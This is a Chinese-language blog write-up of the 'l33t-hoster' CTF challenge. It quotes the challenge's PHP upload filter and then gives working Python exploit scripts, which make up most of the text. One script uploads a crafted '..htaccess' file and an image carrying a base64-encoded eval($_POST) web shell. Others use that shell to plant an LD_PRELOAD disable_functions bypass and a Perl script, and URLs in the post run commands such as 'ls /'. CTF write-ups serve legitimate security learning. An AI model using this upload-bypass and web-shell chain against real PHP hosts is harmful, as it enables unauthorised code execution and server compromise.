l33t-hoster - 技术栈

这个题做了两天了

拼尽全力卡在最后一步最后决定先放放感觉是平台flag有点问题（之前有个题也是flag为空）

明天总结下学习的知识点先记录下做题过程看了很多大佬的博客

先看源代码发现 /?source 看这个页面发现过滤的代码

<?php

if (isset($_GET $"source"$ ))

die(highlight_file(FILE));

session_start();

if (!isset($_SESSION $"home"$ )) {

$_SESSION $"home"$ = bin2hex(random_bytes(20));

}

$userdir = "images/{$ _SESSION $"home"$ }/";

if (!file_exists($userdir)) {

mkdir($userdir);

}

$disallowed_ext = array(

"php",

"php3",

"php4",

"php5",

"php7",

"pht",

"phtm",

"phtml",

"phar",

"phps",

);

if (isset($_POST $"upload"$ )) {

if ($_FILES $'image'$ $'error'$ !== UPLOAD_ERR_OK) {

die("yuuuge fail");

}

$tmp_name =$ _FILES $"image"$ $"tmp_name"$ ;

$name =$ _FILES $"image"$ $"name"$ ;

$parts = explode(".",$ name);

$ext = array_pop($ parts);

if (empty($parts $0$ )) {

array_shift($parts);

}

if (count($parts) === 0) {

die("lol filename is empty");

}

if (in_array( $ext,$ disallowed_ext, TRUE)) {

die("lol nice try, but im not stupid dude...");

}

$image = file_get_contents($ tmp_name);

if (mb_strpos($image, "<?") !== FALSE) {

die("why would you need php in a pic.....");

}

if (!exif_imagetype($tmp_name)) {

die("not an image.");

}

$image_size = getimagesize($ tmp_name);

if ( $image_size\[0\] !== 1337 \|\|$ image_size $1$ !== 1337) {

die("lol noob, your pic is not l33t enough");

}

$name = implode(".",$ parts);

move_uploaded_file( $tmp_name,$ userdir . $name . "." .$ ext);

}

echo "<h3>Your <a href=$userdir>files</a>:</h3><ul>";

foreach(glob( $userdir . "\*") as$ file) {

echo "<li><a href=' $file'\>$ file</a></li>";

}

echo "</ul>";

确实严格 php过滤的差不多我就想到了.htaccess 但要求实在太多了没啥思路

就去看大佬博客了

https://blog.csdn.net/Uchiha_duan/article/details/131706725

https://blog.csdn.net/mochu7777777/article/details/113772879?ops_request_misc=elastic_search_misc\&request_id=0a7ed329acd0355e5f9fe1bd6843d728\&biz_id=0\&utm_medium=distribute.pc_search_result.none-task-blog-2\~all\~ElasticSearch\~search_v2-1-113772879-null-null.nonecase\&utm_term=l33t-hoster\&spm=1018.2226.3001.4450

python 复制代码

#!/usr/bin/env python3
import requests
import base64

VALID_WBMP = b"\x00\x00\x8a\x39\x8a\x39\x0a"
URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/"
RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816"

COOKIES = {
    "PHPSESSID" : "m43d1fip3edjosh48kpjnqj0b2"
}

def upload_content(name, content):

    data = {
        "image" : (name, content, 'image/png'),
        "upload" : (None, "Submit Query", None)
    }
    
    response = requests.post(URL, files=data, cookies=COOKIES)

HT_ACCESS = VALID_WBMP + b"""
AddType application/x-httpd-php .jpg
php_value auto_append_file "php://filter/convert.base64-decode/resource=mochu7.jpg"
"""
TARGET_FILE = VALID_WBMP + b"AA" + base64.b64encode(b"""
<?php
  echo "shell ok!";
  eval($_POST['mochu7']);
?>
""")

upload_content("..htaccess", HT_ACCESS)
upload_content("mochu7.jpg", TARGET_FILE)

response = requests.post(URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg")
print(response.text)

先看末初大佬的博客

学习到拿到shell 然后我是在ctf2(前buuctf)上做的

也遇到了mochu7=var_dump(file_get_contents('/flag'));返回bool(false)的问题

通过看

https://blog.csdn.net/Uchiha_duan/article/details/131706725

https://github.com/mdsnins/ctf-writeups/blob/master/2019/Insomnihack 2019/l33t-hoster/l33t-hoster.md

学习到了LD_PRELOAD注射

python 复制代码

import requests
import base64
URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/"
RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816"

url = URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg"

param = {"mochu7":"move_uploaded_file($_FILES['file']['tmp_name'],'/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/bypass_disablefunc.php');echo 'ok';var_dump(scandir('/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816'));"}
files = [('file',('bypass_disablefunc.php',open("bypass_disablefunc.php","rb"),'application/octet-stream'))]
r = requests.post(url=url, files=files, data=param)
print(r.text)

python 复制代码

import requests

URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/"
RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816"

url = URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg"

param = {"mochu7":"move_uploaded_file($_FILES['file']['tmp_name'],'/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/bypass_disablefunc_x64.so');echo 'ok';var_dump(scandir('/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816'));"}
files = [('file',('bypass_disablefunc_x64.so',open("bypass_disablefunc_x64.so","rb"),'application/octet-stream'))]
r = requests.post(url=url, files=files, data=param)
print(r.text)

/bypass_disablefunc.php?cmd=ls /&outpath=/tmp/xx&sopath=/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so

https://274fcdc69af496cb834ecac5.http-ctf2.dasctf.com/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc.php?cmd=ls /\&outpath=/tmp/xx\&sopath=/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so

再上传官方的pl文件

/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc.php?cmd=perl fuck.pl&outpath=/tmp/xx&sopath=/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so

python 复制代码

import requests
import base64
URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/"
RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816"

url = URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg"

param = {"mochu7":"move_uploaded_file($_FILES['file']['tmp_name'],'/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/fuck.pl');echo 'ok';var_dump(scandir('/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816'));"}
files = [('file',('fuck.pl',open("fuck.pl","rb"),'application/octet-stream'))]
r = requests.post(url=url, files=files, data=param)
print(r.text)